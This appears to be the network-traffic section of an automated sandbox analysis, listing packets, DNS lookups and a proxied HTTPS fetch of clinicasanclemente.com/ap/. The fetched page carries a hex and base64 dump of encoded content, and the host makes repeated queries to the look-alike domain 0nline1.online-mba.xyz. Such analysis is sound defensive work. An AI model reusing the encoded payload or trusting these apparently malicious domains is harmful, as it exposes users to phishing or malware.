Jan 9, 2025 17:08:09.448483944 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:09.448502064 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:09.448668957 CET	49740	443	192.168.2.4	68.65.120.84
Jan 9, 2025 17:08:09.448674917 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:09.448709965 CET	49740	443	192.168.2.4	68.65.120.84
Jan 9, 2025 17:08:09.467061043 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:09.467149019 CET	49740	443	192.168.2.4	68.65.120.84
Jan 9, 2025 17:08:09.467155933 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:09.467175007 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:09.467212915 CET	49740	443	192.168.2.4	68.65.120.84
Jan 9, 2025 17:08:09.576446056 CET	49740	443	192.168.2.4	68.65.120.84
Jan 9, 2025 17:08:09.576488972 CET	443	49740	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:09.661036015 CET	49739	443	192.168.2.4	68.65.120.84
Jan 9, 2025 17:08:09.707329988 CET	443	49739	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:09.835728884 CET	443	49739	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:09.844407082 CET	443	49739	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:09.844472885 CET	49739	443	192.168.2.4	68.65.120.84
Jan 9, 2025 17:08:09.844882011 CET	49739	443	192.168.2.4	68.65.120.84
Jan 9, 2025 17:08:09.844903946 CET	443	49739	68.65.120.84	192.168.2.4
Jan 9, 2025 17:08:16.014576912 CET	49723	80	192.168.2.4	2.22.50.144
Jan 9, 2025 17:08:16.019629002 CET	80	49723	2.22.50.144	192.168.2.4
Jan 9, 2025 17:08:16.019682884 CET	49723	80	192.168.2.4	2.22.50.144
Jan 9, 2025 17:08:17.097002983 CET	443	49738	142.250.186.164	192.168.2.4
Jan 9, 2025 17:08:17.097059011 CET	443	49738	142.250.186.164	192.168.2.4
Jan 9, 2025 17:08:17.097174883 CET	49738	443	192.168.2.4	142.250.186.164
Jan 9, 2025 17:08:18.959654093 CET	49738	443	192.168.2.4	142.250.186.164
Jan 9, 2025 17:08:18.959686995 CET	443	49738	142.250.186.164	192.168.2.4
Jan 9, 2025 17:09:02.161267042 CET	49724	80	192.168.2.4	199.232.210.172
Jan 9, 2025 17:09:02.166516066 CET	80	49724	199.232.210.172	192.168.2.4
Jan 9, 2025 17:09:02.166594028 CET	49724	80	192.168.2.4	199.232.210.172
Jan 9, 2025 17:09:06.616791964 CET	49858	443	192.168.2.4	142.250.186.164
Jan 9, 2025 17:09:06.616842031 CET	443	49858	142.250.186.164	192.168.2.4
Jan 9, 2025 17:09:06.616931915 CET	49858	443	192.168.2.4	142.250.186.164
Jan 9, 2025 17:09:06.617151022 CET	49858	443	192.168.2.4	142.250.186.164
Jan 9, 2025 17:09:06.617189884 CET	443	49858	142.250.186.164	192.168.2.4
Jan 9, 2025 17:09:07.266601086 CET	443	49858	142.250.186.164	192.168.2.4
Jan 9, 2025 17:09:07.300431013 CET	49858	443	192.168.2.4	142.250.186.164
Jan 9, 2025 17:09:07.300512075 CET	443	49858	142.250.186.164	192.168.2.4
Jan 9, 2025 17:09:07.301064968 CET	443	49858	142.250.186.164	192.168.2.4
Jan 9, 2025 17:09:07.303060055 CET	49858	443	192.168.2.4	142.250.186.164
Jan 9, 2025 17:09:07.303138971 CET	443	49858	142.250.186.164	192.168.2.4
Jan 9, 2025 17:09:07.361653090 CET	49858	443	192.168.2.4	142.250.186.164
Jan 9, 2025 17:09:17.197649956 CET	443	49858	142.250.186.164	192.168.2.4
Jan 9, 2025 17:09:17.197709084 CET	443	49858	142.250.186.164	192.168.2.4
Jan 9, 2025 17:09:17.197820902 CET	49858	443	192.168.2.4	142.250.186.164
Jan 9, 2025 17:09:18.959151030 CET	49858	443	192.168.2.4	142.250.186.164
Jan 9, 2025 17:09:18.959194899 CET	443	49858	142.250.186.164	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 9, 2025 17:08:02.468964100 CET	53	49848	1.1.1.1	192.168.2.4
Jan 9, 2025 17:08:02.498549938 CET	53	55199	1.1.1.1	192.168.2.4
Jan 9, 2025 17:08:03.493657112 CET	53	56382	1.1.1.1	192.168.2.4
Jan 9, 2025 17:08:06.554194927 CET	62805	53	192.168.2.4	1.1.1.1
Jan 9, 2025 17:08:06.554572105 CET	52790	53	192.168.2.4	1.1.1.1
Jan 9, 2025 17:08:06.560868979 CET	53	62805	1.1.1.1	192.168.2.4
Jan 9, 2025 17:08:06.561297894 CET	53	52790	1.1.1.1	192.168.2.4
Jan 9, 2025 17:08:07.866121054 CET	60311	53	192.168.2.4	1.1.1.1
Jan 9, 2025 17:08:07.866262913 CET	59602	53	192.168.2.4	1.1.1.1
Jan 9, 2025 17:08:07.878905058 CET	53	59602	1.1.1.1	192.168.2.4
Jan 9, 2025 17:08:07.900584936 CET	53	60311	1.1.1.1	192.168.2.4
Jan 9, 2025 17:08:09.667128086 CET	53	62779	1.1.1.1	192.168.2.4
Jan 9, 2025 17:08:13.745136976 CET	138	138	192.168.2.4	192.168.2.255
Jan 9, 2025 17:08:20.419329882 CET	53	53307	1.1.1.1	192.168.2.4
Jan 9, 2025 17:08:24.250590086 CET	63588	53	192.168.2.4	1.1.1.1
Jan 9, 2025 17:08:24.250885963 CET	50783	53	192.168.2.4	1.1.1.1
Jan 9, 2025 17:08:24.270525932 CET	53	63588	1.1.1.1	192.168.2.4
Jan 9, 2025 17:08:24.272803068 CET	53	50783	1.1.1.1	192.168.2.4
Jan 9, 2025 17:08:24.273360968 CET	60530	53	192.168.2.4	1.1.1.1
Jan 9, 2025 17:08:24.284105062 CET	53	60530	1.1.1.1	192.168.2.4
Jan 9, 2025 17:08:24.355858088 CET	54327	53	192.168.2.4	8.8.8.8
Jan 9, 2025 17:08:24.356185913 CET	55487	53	192.168.2.4	1.1.1.1
Jan 9, 2025 17:08:24.362977982 CET	53	55487	1.1.1.1	192.168.2.4
Jan 9, 2025 17:08:24.364511967 CET	53	54327	8.8.8.8	192.168.2.4
Jan 9, 2025 17:08:25.368539095 CET	53105	53	192.168.2.4	1.1.1.1
Jan 9, 2025 17:08:25.368675947 CET	53378	53	192.168.2.4	1.1.1.1
Jan 9, 2025 17:08:25.377784967 CET	53	53105	1.1.1.1	192.168.2.4
Jan 9, 2025 17:08:25.384635925 CET	53	53378	1.1.1.1	192.168.2.4
Jan 9, 2025 17:08:30.404686928 CET	64926	53	192.168.2.4	1.1.1.1
Jan 9, 2025 17:08:30.404870987 CET	58207	53	192.168.2.4	1.1.1.1
Jan 9, 2025 17:08:30.413489103 CET	53	58207	1.1.1.1	192.168.2.4
Jan 9, 2025 17:08:30.417789936 CET	53	64926	1.1.1.1	192.168.2.4
Jan 9, 2025 17:08:30.418890953 CET	58253	53	192.168.2.4	1.1.1.1
Jan 9, 2025 17:08:30.428750992 CET	53	58253	1.1.1.1	192.168.2.4
Jan 9, 2025 17:08:36.249083996 CET	57936	53	192.168.2.4	1.1.1.1
Jan 9, 2025 17:08:36.249083996 CET	64823	53	192.168.2.4	1.1.1.1
Jan 9, 2025 17:08:36.257783890 CET	53	57936	1.1.1.1	192.168.2.4
Jan 9, 2025 17:08:36.263629913 CET	53	64823	1.1.1.1	192.168.2.4
Jan 9, 2025 17:08:36.264199018 CET	63921	53	192.168.2.4	1.1.1.1
Jan 9, 2025 17:08:36.281095982 CET	53	63921	1.1.1.1	192.168.2.4
Jan 9, 2025 17:08:36.293430090 CET	59361	53	192.168.2.4	1.1.1.1
Jan 9, 2025 17:08:36.293966055 CET	61932	53	192.168.2.4	8.8.8.8
Jan 9, 2025 17:08:36.300265074 CET	53	59361	1.1.1.1	192.168.2.4
Jan 9, 2025 17:08:36.301265001 CET	53	61932	8.8.8.8	192.168.2.4
Jan 9, 2025 17:08:39.200105906 CET	53	63525	1.1.1.1	192.168.2.4
Jan 9, 2025 17:09:01.950880051 CET	53	60726	1.1.1.1	192.168.2.4
Jan 9, 2025 17:09:02.145755053 CET	53	62963	1.1.1.1	192.168.2.4
Jan 9, 2025 17:09:06.309418917 CET	58298	53	192.168.2.4	1.1.1.1
Jan 9, 2025 17:09:06.309534073 CET	52158	53	192.168.2.4	1.1.1.1
Jan 9, 2025 17:09:06.327634096 CET	53	58298	1.1.1.1	192.168.2.4
Jan 9, 2025 17:09:06.330037117 CET	53	52158	1.1.1.1	192.168.2.4
Jan 9, 2025 17:09:06.330667019 CET	61365	53	192.168.2.4	1.1.1.1
Jan 9, 2025 17:09:06.344058990 CET	53	61365	1.1.1.1	192.168.2.4
Jan 9, 2025 17:09:06.719813108 CET	63100	53	192.168.2.4	1.1.1.1
Jan 9, 2025 17:09:06.720029116 CET	65072	53	192.168.2.4	1.1.1.1
Jan 9, 2025 17:09:06.729790926 CET	53	65072	1.1.1.1	192.168.2.4
Jan 9, 2025 17:09:06.751132011 CET	53	63100	1.1.1.1	192.168.2.4
Jan 9, 2025 17:09:06.764997959 CET	55192	53	192.168.2.4	1.1.1.1
Jan 9, 2025 17:09:06.765193939 CET	58943	53	192.168.2.4	8.8.8.8
Jan 9, 2025 17:09:06.772303104 CET	53	58943	8.8.8.8	192.168.2.4
Jan 9, 2025 17:09:06.772635937 CET	53	55192	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 9, 2025 17:08:06.554194927 CET	192.168.2.4	1.1.1.1	0x5f60	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Jan 9, 2025 17:08:06.554572105 CET	192.168.2.4	1.1.1.1	0x3773	Standard query (0)	www.google.com	65	IN (0x0001)	false
Jan 9, 2025 17:08:07.866121054 CET	192.168.2.4	1.1.1.1	0x27f	Standard query (0)	clinicasanclemente.com	A (IP address)	IN (0x0001)	false
Jan 9, 2025 17:08:07.866262913 CET	192.168.2.4	1.1.1.1	0x20c0	Standard query (0)	clinicasanclemente.com	65	IN (0x0001)	false
Jan 9, 2025 17:08:24.250590086 CET	192.168.2.4	1.1.1.1	0xee67	Standard query (0)	0nline1.online-mba.xyz	A (IP address)	IN (0x0001)	false
Jan 9, 2025 17:08:24.250885963 CET	192.168.2.4	1.1.1.1	0x9bc	Standard query (0)	0nline1.online-mba.xyz	65	IN (0x0001)	false
Jan 9, 2025 17:08:24.273360968 CET	192.168.2.4	1.1.1.1	0x7f59	Standard query (0)	0nline1.online-mba.xyz	A (IP address)	IN (0x0001)	false
Jan 9, 2025 17:08:24.355858088 CET	192.168.2.4	8.8.8.8	0x2ada	Standard query (0)	google.com	A (IP address)	IN (0x0001)	false
Jan 9, 2025 17:08:24.356185913 CET	192.168.2.4	1.1.1.1	0xb1a8	Standard query (0)	google.com	A (IP address)	IN (0x0001)	false
Jan 9, 2025 17:08:25.368539095 CET	192.168.2.4	1.1.1.1	0x2c2e	Standard query (0)	0nline1.online-mba.xyz	A (IP address)	IN (0x0001)	false
Jan 9, 2025 17:08:25.368675947 CET	192.168.2.4	1.1.1.1	0xb9e5	Standard query (0)	0nline1.online-mba.xyz	65	IN (0x0001)	false
Jan 9, 2025 17:08:30.404686928 CET	192.168.2.4	1.1.1.1	0xad83	Standard query (0)	0nline1.online-mba.xyz	A (IP address)	IN (0x0001)	false
Jan 9, 2025 17:08:30.404870987 CET	192.168.2.4	1.1.1.1	0xb34a	Standard query (0)	0nline1.online-mba.xyz	65	IN (0x0001)	false
Jan 9, 2025 17:08:30.418890953 CET	192.168.2.4	1.1.1.1	0x4cff	Standard query (0)	0nline1.online-mba.xyz	A (IP address)	IN (0x0001)	false
Jan 9, 2025 17:08:36.249083996 CET	192.168.2.4	1.1.1.1	0xcf18	Standard query (0)	0nline1.online-mba.xyz	A (IP address)	IN (0x0001)	false
Jan 9, 2025 17:08:36.249083996 CET	192.168.2.4	1.1.1.1	0x40e1	Standard query (0)	0nline1.online-mba.xyz	65	IN (0x0001)	false
Jan 9, 2025 17:08:36.264199018 CET	192.168.2.4	1.1.1.1	0x2702	Standard query (0)	0nline1.online-mba.xyz	A (IP address)	IN (0x0001)	false
Jan 9, 2025 17:08:36.293430090 CET	192.168.2.4	1.1.1.1	0xb977	Standard query (0)	google.com	A (IP address)	IN (0x0001)	false
Jan 9, 2025 17:08:36.293966055 CET	192.168.2.4	8.8.8.8	0x7db6	Standard query (0)	google.com	A (IP address)	IN (0x0001)	false
Jan 9, 2025 17:09:06.309418917 CET	192.168.2.4	1.1.1.1	0x907b	Standard query (0)	0nline1.online-mba.xyz	A (IP address)	IN (0x0001)	false
Jan 9, 2025 17:09:06.309534073 CET	192.168.2.4	1.1.1.1	0x9327	Standard query (0)	0nline1.online-mba.xyz	65	IN (0x0001)	false
Jan 9, 2025 17:09:06.330667019 CET	192.168.2.4	1.1.1.1	0x6739	Standard query (0)	0nline1.online-mba.xyz	A (IP address)	IN (0x0001)	false
Jan 9, 2025 17:09:06.719813108 CET	192.168.2.4	1.1.1.1	0xdb6e	Standard query (0)	0nline1.online-mba.xyz	A (IP address)	IN (0x0001)	false
Jan 9, 2025 17:09:06.720029116 CET	192.168.2.4	1.1.1.1	0x194b	Standard query (0)	0nline1.online-mba.xyz	65	IN (0x0001)	false
Jan 9, 2025 17:09:06.764997959 CET	192.168.2.4	1.1.1.1	0xfa30	Standard query (0)	google.com	A (IP address)	IN (0x0001)	false
Jan 9, 2025 17:09:06.765193939 CET	192.168.2.4	8.8.8.8	0x11b2	Standard query (0)	google.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 9, 2025 17:08:06.560868979 CET	1.1.1.1	192.168.2.4	0x5f60	No error (0)	www.google.com		142.250.186.164	A (IP address)	IN (0x0001)	false
Jan 9, 2025 17:08:06.561297894 CET	1.1.1.1	192.168.2.4	0x3773	No error (0)	www.google.com			65	IN (0x0001)	false
Jan 9, 2025 17:08:07.900584936 CET	1.1.1.1	192.168.2.4	0x27f	No error (0)	clinicasanclemente.com		68.65.120.84	A (IP address)	IN (0x0001)	false
Jan 9, 2025 17:08:24.270525932 CET	1.1.1.1	192.168.2.4	0xee67	Name error (3)	0nline1.online-mba.xyz	none	none	A (IP address)	IN (0x0001)	false
Jan 9, 2025 17:08:24.272803068 CET	1.1.1.1	192.168.2.4	0x9bc	Name error (3)	0nline1.online-mba.xyz	none	none	65	IN (0x0001)	false
Jan 9, 2025 17:08:24.284105062 CET	1.1.1.1	192.168.2.4	0x7f59	Name error (3)	0nline1.online-mba.xyz	none	none	A (IP address)	IN (0x0001)	false
Jan 9, 2025 17:08:24.362977982 CET	1.1.1.1	192.168.2.4	0xb1a8	No error (0)	google.com		172.217.16.206	A (IP address)	IN (0x0001)	false
Jan 9, 2025 17:08:24.364511967 CET	8.8.8.8	192.168.2.4	0x2ada	No error (0)	google.com		172.217.168.78	A (IP address)	IN (0x0001)	false
Jan 9, 2025 17:08:25.377784967 CET	1.1.1.1	192.168.2.4	0x2c2e	Name error (3)	0nline1.online-mba.xyz	none	none	A (IP address)	IN (0x0001)	false
Jan 9, 2025 17:08:25.384635925 CET	1.1.1.1	192.168.2.4	0xb9e5	Name error (3)	0nline1.online-mba.xyz	none	none	65	IN (0x0001)	false
Jan 9, 2025 17:08:30.413489103 CET	1.1.1.1	192.168.2.4	0xb34a	Name error (3)	0nline1.online-mba.xyz	none	none	65	IN (0x0001)	false
Jan 9, 2025 17:08:30.417789936 CET	1.1.1.1	192.168.2.4	0xad83	Name error (3)	0nline1.online-mba.xyz	none	none	A (IP address)	IN (0x0001)	false
Jan 9, 2025 17:08:30.428750992 CET	1.1.1.1	192.168.2.4	0x4cff	Name error (3)	0nline1.online-mba.xyz	none	none	A (IP address)	IN (0x0001)	false
Jan 9, 2025 17:08:36.257783890 CET	1.1.1.1	192.168.2.4	0xcf18	Name error (3)	0nline1.online-mba.xyz	none	none	A (IP address)	IN (0x0001)	false
Jan 9, 2025 17:08:36.263629913 CET	1.1.1.1	192.168.2.4	0x40e1	Name error (3)	0nline1.online-mba.xyz	none	none	65	IN (0x0001)	false
Jan 9, 2025 17:08:36.281095982 CET	1.1.1.1	192.168.2.4	0x2702	Name error (3)	0nline1.online-mba.xyz	none	none	A (IP address)	IN (0x0001)	false
Jan 9, 2025 17:08:36.300265074 CET	1.1.1.1	192.168.2.4	0xb977	No error (0)	google.com		142.250.186.78	A (IP address)	IN (0x0001)	false
Jan 9, 2025 17:08:36.301265001 CET	8.8.8.8	192.168.2.4	0x7db6	No error (0)	google.com		172.217.168.78	A (IP address)	IN (0x0001)	false
Jan 9, 2025 17:09:06.327634096 CET	1.1.1.1	192.168.2.4	0x907b	Name error (3)	0nline1.online-mba.xyz	none	none	A (IP address)	IN (0x0001)	false
Jan 9, 2025 17:09:06.330037117 CET	1.1.1.1	192.168.2.4	0x9327	Name error (3)	0nline1.online-mba.xyz	none	none	65	IN (0x0001)	false
Jan 9, 2025 17:09:06.344058990 CET	1.1.1.1	192.168.2.4	0x6739	Name error (3)	0nline1.online-mba.xyz	none	none	A (IP address)	IN (0x0001)	false
Jan 9, 2025 17:09:06.729790926 CET	1.1.1.1	192.168.2.4	0x194b	Name error (3)	0nline1.online-mba.xyz	none	none	65	IN (0x0001)	false
Jan 9, 2025 17:09:06.751132011 CET	1.1.1.1	192.168.2.4	0xdb6e	Name error (3)	0nline1.online-mba.xyz	none	none	A (IP address)	IN (0x0001)	false
Jan 9, 2025 17:09:06.772303104 CET	8.8.8.8	192.168.2.4	0x11b2	No error (0)	google.com		172.217.168.78	A (IP address)	IN (0x0001)	false
Jan 9, 2025 17:09:06.772635937 CET	1.1.1.1	192.168.2.4	0xfa30	No error (0)	google.com		216.58.206.46	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

clinicasanclemente.com

https:

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49740	68.65.120.84	443	4564	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 16:08:08 UTC	668	OUT	GET /ap/ HTTP/1.1 Host: clinicasanclemente.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-09 16:08:09 UTC	269	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 x-powered-by: PHP/8.1.31 content-type: text/html; charset=UTF-8 transfer-encoding: chunked date: Thu, 09 Jan 2025 16:08:08 GMT server: LiteSpeed vary: User-Agent x-turbo-charged-by: LiteSpeed connection: close
2025-01-09 16:08:09 UTC	16115	IN	Data Raw: 31 30 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 2a 2a 2a 2a 2d 2d 2d 2a 2a 2a 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 53 65 67 6f 65 20 55 49 22 2c 20 22 53 65 67 Data Ascii: 10000<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>**---*</title> <style> body { font-family: "Segoe UI", "Seg
2025-01-09 16:08:09 UTC	16384	IN	Data Raw: 69 48 41 56 6c 4d 71 68 36 77 34 33 6e 35 71 41 52 6a 69 66 6d 49 63 65 7a 58 4a 74 42 4b 61 31 34 4f 4c 37 6c 57 6f 42 6a 65 48 34 2f 4f 4f 42 4f 79 63 49 45 5a 4d 56 37 46 37 4e 55 73 48 6a 76 62 66 4d 68 63 5a 78 78 4f 6e 49 69 55 5a 78 77 47 6d 51 38 68 53 4b 46 37 34 45 51 74 36 4d 6f 41 5a 4a 53 67 70 4a 39 74 50 4c 39 6d 6e 41 39 62 69 31 6d 4e 6e 56 63 61 75 49 51 58 68 7a 39 4b 48 62 4a 57 53 46 7a 56 55 6f 4c 4e 4f 30 70 4a 72 54 66 69 4f 73 51 4f 78 72 56 35 37 38 41 74 75 74 6a 33 4d 6c 2f 71 35 6f 5a 72 41 7a 6e 71 6d 66 67 63 55 34 6a 74 38 42 6b 63 70 63 33 50 6d 58 64 2b 74 5a 38 32 37 50 5a 57 6a 50 4f 68 67 78 52 34 59 4b 66 70 46 68 65 2f 38 54 6a 43 33 36 79 44 33 73 73 77 62 59 66 52 59 69 48 32 38 69 43 78 58 77 43 4c 2f 2b 4c 4a 79 Data Ascii: iHAVlMqh6w43n5qARjifmIcezXJtBKa14OL7lWoBjeH4/OOBOycIEZMV7F7NUsHjvbfMhcZxxOnIiUZxwGmQ8hSKF74EQt6MoAZJSgpJ9tPL9mnA9bi1mNnVcauIQXhz9KHbJWSFzVUoLNO0pJrTfiOsQOxrV578Atutj3Ml/q5oZrAznqmfgcU4jt8Bkcpc3PmXd+tZ827PZWjPOhgxR4YKfpFhe/8TjC36yD3sswbYfRYiH28iCxXwCL/+LJy
2025-01-09 16:08:09 UTC	16384	IN	Data Raw: 72 4f 49 58 75 4f 68 75 59 7a 6d 62 66 38 31 73 39 56 39 76 57 4f 77 4a 77 77 4c 38 54 68 65 44 39 79 61 36 36 4d 64 34 48 4c 4d 4d 6f 75 50 50 79 39 61 76 66 31 4b 73 37 49 42 57 49 6e 54 30 49 6e 7a 42 74 63 64 72 6b 32 59 35 41 68 68 78 48 34 72 69 7a 38 42 63 75 38 6f 35 38 37 70 4b 6e 6a 6d 70 72 48 79 35 30 73 38 4a 39 67 32 71 35 32 6a 4d 47 69 58 68 33 57 38 54 49 6c 36 4c 34 6a 49 4a 42 2f 59 30 43 41 78 63 62 75 46 44 68 54 30 2b 73 42 51 6f 74 56 48 43 52 41 6b 55 51 33 43 79 43 41 67 55 32 31 69 46 76 4e 78 46 61 75 74 55 67 41 69 4a 65 6d 4c 44 6a 4b 2b 75 56 53 4a 33 48 44 33 42 69 4f 56 37 6c 32 4a 59 35 4f 4a 71 62 65 48 58 4a 67 51 61 31 46 72 75 2b 48 77 69 77 69 61 4d 57 49 53 32 57 73 63 43 4e 70 45 6a 79 4b 7a 76 6b 2b 69 56 71 51 35 Data Ascii: rOIXuOhuYzmbf81s9V9vWOwJwwL8TheD9ya66Md4HLMMouPPy9avf1Ks7IBWInT0InzBtcdrk2Y5AhhxH4riz8Bcu8o587pKnjmprHy50s8J9g2q52jMGiXh3W8TIl6L4jIJB/Y0CAxcbuFDhT0+sBQotVHCRAkUQ3CyCAgU21iFvNxFautUgAiJemLDjK+uVSJ3HD3BiOV7l2JY5OJqbeHXJgQa1Fru+HwiwiaMWIS2WscCNpEjyKzvk+iVqQ5
2025-01-09 16:08:09 UTC	15259	IN	Data Raw: 4c 41 63 78 41 75 48 73 71 55 5a 35 77 58 4e 79 39 5a 6a 50 41 7a 59 7a 4a 51 4b 6b 49 46 38 72 48 4a 76 68 76 2f 2f 54 58 32 72 6a 34 36 31 2b 6a 57 44 51 32 4e 64 7a 79 6e 7a 59 72 59 44 52 47 4b 67 79 73 38 4f 69 4b 52 78 65 4b 6d 78 50 58 47 78 57 2f 76 4c 6f 57 30 72 42 77 63 4f 68 54 6a 6d 6d 67 71 58 51 50 68 6d 77 35 53 7a 37 70 76 65 51 74 45 32 38 34 6f 57 44 35 71 4a 44 4e 44 72 4e 35 4c 79 6f 6c 53 77 4e 46 35 53 42 50 7a 67 73 6d 4e 76 4f 67 39 36 50 54 4b 39 73 45 78 2b 37 38 46 6f 55 37 2f 6c 4a 4d 4e 44 47 56 54 63 4d 70 53 4c 70 6c 77 71 46 71 73 65 2b 4d 36 2f 6f 6b 38 75 67 67 69 46 2f 64 31 39 54 43 44 64 6b 70 32 32 36 78 58 2f 41 33 34 6f 45 78 67 76 73 57 33 73 66 55 6a 68 32 61 36 79 6c 35 36 54 4b 49 74 34 58 45 35 72 6c 52 6c 62 Data Ascii: LAcxAuHsqUZ5wXNy9ZjPAzYzJQKkIF8rHJvhv//TX2rj461+jWDQ2NdzynzYrYDRGKgys8OiKRxeKmxPXGxW/vLoW0rBwcOhTjmmgqXQPhmw5Sz7pveQtE284oWD5qJDNDrN5LyolSwNF5SBPzgsmNvOg96PTK9sEx+78FoU7/lJMNDGVTcMpSLplwqFqse+M6/ok8uggiF/d19TCDdkp226xX/A34oExgvsW3sfUjh2a6yl56TKIt4XE5rlRlb
2025-01-09 16:08:09 UTC	1401	IN	Data Raw: 50 69 68 74 64 61 32 75 43 63 4d 2b 53 35 65 61 6a 4f 77 57 6c 4c 61 48 34 4a 75 45 59 54 4b 41 53 63 56 50 4d 51 56 55 76 57 61 73 30 32 74 34 32 4b 55 67 64 66 31 78 34 51 65 39 31 30 6e 55 2f 47 5a 66 36 78 48 72 6a 66 6a 7a 78 77 67 55 48 55 4e 58 65 37 6b 75 69 6a 79 74 33 6f 48 76 45 65 31 2f 55 38 66 32 4b 70 33 70 38 61 46 55 41 64 76 7a 6c 68 53 4f 56 4e 6f 52 32 58 35 6b 55 55 37 4d 75 54 6f 71 62 53 58 73 74 6c 50 62 47 44 78 50 48 36 42 41 72 50 7a 59 6f 69 47 74 7a 52 52 63 32 4e 42 41 4d 49 76 77 6c 53 47 78 66 36 39 6b 51 32 4b 4b 36 2f 55 58 47 78 73 54 34 64 70 4c 4b 57 44 62 61 53 74 62 43 35 43 4d 56 72 4d 64 35 77 6b 41 59 46 47 68 62 36 64 6f 55 32 4b 76 44 57 68 44 55 78 30 4c 53 34 6c 42 72 66 35 54 34 43 47 79 4d 6e 44 4b 46 59 43 Data Ascii: Pihtda2uCcM+S5eajOwWlLaH4JuEYTKAScVPMQVUvWas02t42KUgdf1x4Qe910nU/GZf6xHrjfjzxwgUHUNXe7kuijyt3oHvEe1/U8f2Kp3p8aFUAdvzlhSOVNoR2X5kUU7MuToqbSXstlPbGDxPH6BArPzYoiGtzRRc2NBAMIvwlSGxf69kQ2KK6/UXGxsT4dpLKWDbaStbC5CMVrMd5wkAYFGhb6doU2KvDWhDUx0LS4lBrf5T4CGyMnDKFYC
2025-01-09 16:08:09 UTC	16384	IN	Data Raw: 0d 0a 31 30 30 30 30 0d 0a 32 6e 78 79 44 38 4e 75 6d 54 5a 58 39 49 4a 4a 48 47 36 4f 78 4f 46 76 53 37 55 65 4e 6d 6b 31 67 56 6f 63 72 56 48 59 62 44 61 44 49 47 31 49 4b 6e 79 64 6f 6b 47 77 7a 66 4a 65 47 36 63 33 62 59 43 68 4c 6b 33 4a 37 53 70 70 30 68 72 34 47 6a 45 39 76 53 35 7a 47 7a 42 53 65 38 4f 64 57 50 4f 51 64 47 6f 50 49 31 70 63 62 32 55 55 59 55 6b 75 49 37 73 48 63 73 78 6d 47 33 7a 71 74 68 49 78 71 7a 71 7a 36 44 61 70 30 72 6c 2b 36 56 62 73 37 45 46 58 6b 4e 64 4a 56 38 30 32 33 39 38 77 2f 2b 55 6d 72 62 69 63 71 63 66 2b 32 4e 59 32 66 49 4f 4d 37 48 58 7a 50 66 79 58 77 44 79 6d 42 35 33 37 30 74 78 45 50 62 42 31 30 66 57 33 2f 74 35 48 37 7a 37 72 4c 72 34 32 6e 43 51 2f 7a 50 58 75 38 32 2b 58 56 50 55 2b 78 6b 5a 55 38 48 Data Ascii: 100002nxyD8NumTZX9IJJHG6OxOFvS7UeNmk1gVocrVHYbDaDIG1IKnydokGwzfJeG6c3bYChLk3J7Spp0hr4GjE9vS5zGzBSe8OdWPOQdGoPI1pcb2UUYUkuI7sHcsxmG3zqthIxqzqz6Dap0rl+6Vbs7EFXkNdJV802398w/+Umrbicqcf+2NY2fIOM7HXzPfyXwDymB5370txEPbB10fW3/t5H7z7rLr42nCQ/zPXu82+XVPU+xkZU8H
